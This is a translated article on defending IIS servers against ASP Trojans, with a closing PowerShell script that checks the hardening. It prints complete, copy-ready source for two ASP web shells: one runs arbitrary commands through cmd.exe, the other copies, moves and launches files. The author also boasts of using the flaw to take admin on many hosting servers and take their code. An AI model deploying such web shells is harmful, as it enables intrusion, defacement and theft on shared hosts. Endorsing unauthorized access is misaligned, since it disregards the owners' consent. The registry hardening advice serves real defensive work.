How does the server guard against ASP Trojans?

Source: Internet
Author: User


With the development of ASP technology, more and more websites on the network are built on ASP, and ASP support is already a basic function of the IIS server on Windows. However, Trojans and backdoors written in ASP are also growing in number and becoming ever more powerful. Because ASP is a scripting facility provided by the server itself, these ASP script Trojans and backdoors are not detected or removed by anti-virus software; hackers call them "the backdoor that will never be scanned and killed". Their concealment and the difficulty of detecting and removing them pose a serious threat to website security, so preventing and removing ASP Trojans places higher technical demands on us network administrators. Below, based on my personal experience, I discuss how to defend against two typical ASP Trojans, and I hope it helps you.

The following is the code of the first Trojan:

<title>ASP Shell</title>
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- Create the COM objects that we will be using --
Set oScript = Server.CreateObject("WScript.Shell")
Set oScriptNet = Server.CreateObject("WScript.Network")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- Check for a command that we have posted --
szCMD = Request.Form(".cmd")
If (szCMD <> "") Then
    ' -- Use a poor man's pipe ... a temp file --
    szTempFile = "C:\" & oFileSys.GetTempName()
    Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)
End If
%>
<html>
<body>
<form action="<%= Request.ServerVariables("URL") %>" method="post">
<input type="text" name=".cmd" size="45" value="<%= szCMD %>">
<input type="submit" value="Execute Command">
</form>
<pre>
<%
If (IsObject(oFile)) Then
    ' -- Read the output from our command and remove the temp file --
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</pre>
</body>
</html>

Enter dir in the command box and execute it to list the directory. Any DOS command can be used this way, such as copy, net and netstat.

However, its default execution permission is only Guest level, that is, the permission of the IUSR_computername account. Of course, if you add IUSR_computername to the Administrators group, it runs with administrator privileges. This Trojan is convenient to use and behaves almost like a DOS command-line window. However, if the server restricts FSO (no FileSystemObject component), it cannot be used. In addition, it cannot be used in virtual hosts added to the server later; it works only under the "Default Web Site", so its applicability is narrow.

To see how to prevent it, look at its code:

Set oScript = Server.CreateObject("WScript.Shell")   ' creates a WScript.Shell object named oScript for command execution
Set oScriptNet = Server.CreateObject("WScript.Network")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

These three lines create three objects: WScript.Shell, WScript.Network and Scripting.FileSystemObject. You only need to rename or delete the registry items that control the WScript.Shell object, that is, both the "WScript.Shell" item and the "WScript.Shell.1" item. If you only modify the "WScript.Shell" item, a hacker only needs to change the code to Set oScript = Server.CreateObject("WScript.Shell.1") and the backdoor Trojan runs again.

As you may already have thought, the new names for the "WScript.Shell" and "WScript.Shell.1" items must not be easy for hackers to guess. If, for example, you rename "WScript.Shell" to "WScript.Shell888", a hacker only needs to change the code to Set oScript = Server.CreateObject("WScript.Shell888") and the Trojan program runs again. In addition, after the registry is modified, the Web service must be restarted for the setting to take effect.

Next, let's look at the code of the second ASP backdoor Trojan:

<% Response.Write "<font size=6 color=red>Only one operation can be executed at a time.</font>" %>
<% Response.Write Now() %><br>Physical path of the program:
<% Response.Write Request.ServerVariables("APPL_PHYSICAL_PATH") %>
<html>
<title>ASP Shell.Application backdoor</title>
<body>
<form action="<%= Request.ServerVariables("URL") %>" method="post">
<input type="text" name="text" value="<%= szCmd %>"> Enter the directory to view<br>
<input type="text" name="text1" value="<%= szCmd1 %>"> Copy <input type="text" name="text2" value="<%= szCmd2 %>"><br>
<input type="text" name="text3" value="<%= szCmd3 %>"> Move <input type="text" name="text4" value="<%= szCmd4 %>"><br>
Path: <input type="text" name="text5" value="<%= szCmd5 %>"> Program: <input type="text" name="text6" value="<%= szCmd6 %>"><br>
<input type="submit" name="sb" value="Send command">
</form>
</body>
</html>
<%
szCmd = Request.Form("text")   ' directory browsing
If (szCmd <> "") Then
    Set shell = Server.CreateObject("Shell.Application")   ' create a shell object
    Set fod1 = shell.NameSpace(szCmd)
    Set foditems = fod1.Items
    For Each co In foditems
        Response.Write "<font color=red>" & co.Path & "-----" & co.Size & "</font><br>"
    Next
End If
%>
<%
szCmd1 = Request.Form("text1")   ' directory copy; file copy is not allowed
szCmd2 = Request.Form("text2")
If szCmd1 <> "" And szCmd2 <> "" Then
    Set shell1 = Server.CreateObject("Shell.Application")   ' create a shell object
    Set fod1 = shell1.NameSpace(szCmd2)
    ' split the source into its parent path and its last component
    For i = Len(szCmd1) To 1 Step -1
        If Mid(szCmd1, i, 1) = "\" Then
            path = Left(szCmd1, i - 1)
            Exit For
        End If
    Next
    If Len(path) = 2 Then path = path & "\"
    path2 = Right(szCmd1, Len(szCmd1) - i)
    Set fod2 = shell1.NameSpace(path)
    Set foditem = fod2.ParseName(path2)
    fod1.CopyHere foditem
    Response.Write "Command completed successfully!"
End If
%>
<%
szCmd3 = Request.Form("text3")   ' directory move
szCmd4 = Request.Form("text4")
If szCmd3 <> "" And szCmd4 <> "" Then
    Set shell2 = Server.CreateObject("Shell.Application")   ' create a shell object
    Set fod1 = shell2.NameSpace(szCmd4)
    For i = Len(szCmd3) To 1 Step -1
        If Mid(szCmd3, i, 1) = "\" Then
            path = Left(szCmd3, i - 1)
            Exit For
        End If
    Next
    If Len(path) = 2 Then path = path & "\"
    path2 = Right(szCmd3, Len(szCmd3) - i)
    Set fod2 = shell2.NameSpace(path)
    Set foditem = fod2.ParseName(path2)
    fod1.MoveHere foditem
    Response.Write "Command completed successfully!"
End If
%>
<%
szCmd5 = Request.Form("text5")   ' path of the program to execute
szCmd6 = Request.Form("text6")
If szCmd5 <> "" And szCmd6 <> "" Then
    Set shell3 = Server.CreateObject("Shell.Application")   ' create a shell object
    shell3.NameSpace(szCmd5).Items.Item(szCmd6).InvokeVerb
    Response.Write "Command completed successfully!"
End If
%>

To view a directory, enter it and click "Send command". This Trojan can copy, move and execute programs, but many commands are unavailable, such as del, net and netstat. Simple as it is, it is enough to hack a website: for example, the site's home page can be moved elsewhere and a hacker page with the same name copied in its place.

The most frightening thing is that this Trojan works on any virtual host. That is, as long as I am a user of one virtual space on the server, I can upload this Trojan and use it to modify the home page of any other user. So if the hosting provider has not applied the fix, it is really in trouble.

However, in my practice, many virtual hosting providers in China, especially some small ones, have not applied the fix. I used this vulnerability to get admin on many virtual hosting servers and helped them fix the vulnerability. Of course, I also got what I wanted: a lot of good software and code. Many of the ASP programs I use today were taken from them, which is hard to hear. It should be said that they are down.

To put it bluntly, how should we prevent this ASP backdoor Trojan? Look at this line of its code: Set shell = Server.CreateObject("Shell.Application"). Just as before, we only need to rename or delete the "Shell.Application" item and the "Shell.Application.1" item. Remember, if you rename them, make the new name complex; don't let hackers simply guess it. By the way, it is recommended that you rename it on a zombie machine and write down the name; that way it becomes a secret backdoor. Finally, to summarize the two ASP Trojan backdoors and how to prevent them: the first Trojan is more powerful but has a narrow application scope, because it requires FSO support, that is, "Scripting.FileSystemObject". The second Trojan has fewer functions but creates a "Shell.Application" object and works on any virtual host. (The harm is indeed too great; administrators who provide ASP hosting must pay attention!)

In fact, you may have already worked out the prevention for both ASP Trojan backdoors. To prevent ASP backdoor Trojans we only need to rename or delete "Shell.Application", "WScript.Shell" and other dangerous script objects (they are used to create script command channels); once the system restricts the creation of a script shell, the ASP Trojan becomes useless and cannot run.

Note: you can copy the preceding code directly and save it as an ASP file.
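As an added check that is not part of the original article, the following PowerShell script audits the four ProgIDs the article tells you to rename or delete (for the WScript.Shell Trojan and for the Shell.Application Trojan) and confirms that creating an object by that ProgID now fails, which is what Server.CreateObject in both Trojans depends on. It assumes an elevated PowerShell on the IIS host after the registry change and a web service restart; the ProgID list and the function names are this example's own.

```powershell
# Added example, not code from the original article: audit the script-shell ProgIDs
# that the article tells you to rename or delete, and confirm they can no longer be
# created by name. Run in an elevated PowerShell on the IIS host.
$DangerousProgIds = @(
    'WScript.Shell', 'WScript.Shell.1',
    'Shell.Application', 'Shell.Application.1'
)

# Returns the CLSID a ProgID maps to, or $null if the ProgID key is absent (renamed or deleted).
function Get-ProgIdClsid {
    param([Parameter(Mandatory)][string]$ProgId)
    $key = "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID"
    if (-not (Test-Path -LiteralPath $key)) { return $null }
    return (Get-Item -LiteralPath $key).GetValue('')
}

# Returns $true if creating the object by ProgID (what Server.CreateObject does) still succeeds.
function Test-ProgIdCreatable {
    param([Parameter(Mandatory)][string]$ProgId)
    try {
        $obj = New-Object -ComObject $ProgId -ErrorAction Stop
        [void][Runtime.InteropServices.Marshal]::ReleaseComObject($obj)
        return $true
    } catch {
        return $false
    }
}

$report = foreach ($progId in $DangerousProgIds) {
    $clsid = Get-ProgIdClsid -ProgId $progId
    [pscustomobject]@{
        ProgId     = $progId
        Registered = [bool]$clsid
        CLSID      = $clsid
        Creatable  = Test-ProgIdCreatable -ProgId $progId
    }
}
$report | Format-Table -AutoSize

# Hardening is only complete when every row shows Registered=False and Creatable=False.
# ASP pages only see the change after the web service is restarted (iisreset).
if ($report | Where-Object { $_.Creatable }) {
    Write-Warning 'At least one script-shell ProgID can still be created; the ASP Trojans above would still work.'
}
```

New-Object runs under your own account rather than the IIS identity, but the ProgID lookup it performs is the same machine-wide HKEY_CLASSES_ROOT lookup the ASP code performs, so, assuming no per-user class registrations, a failure here means the same CreateObject call fails in ASP.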
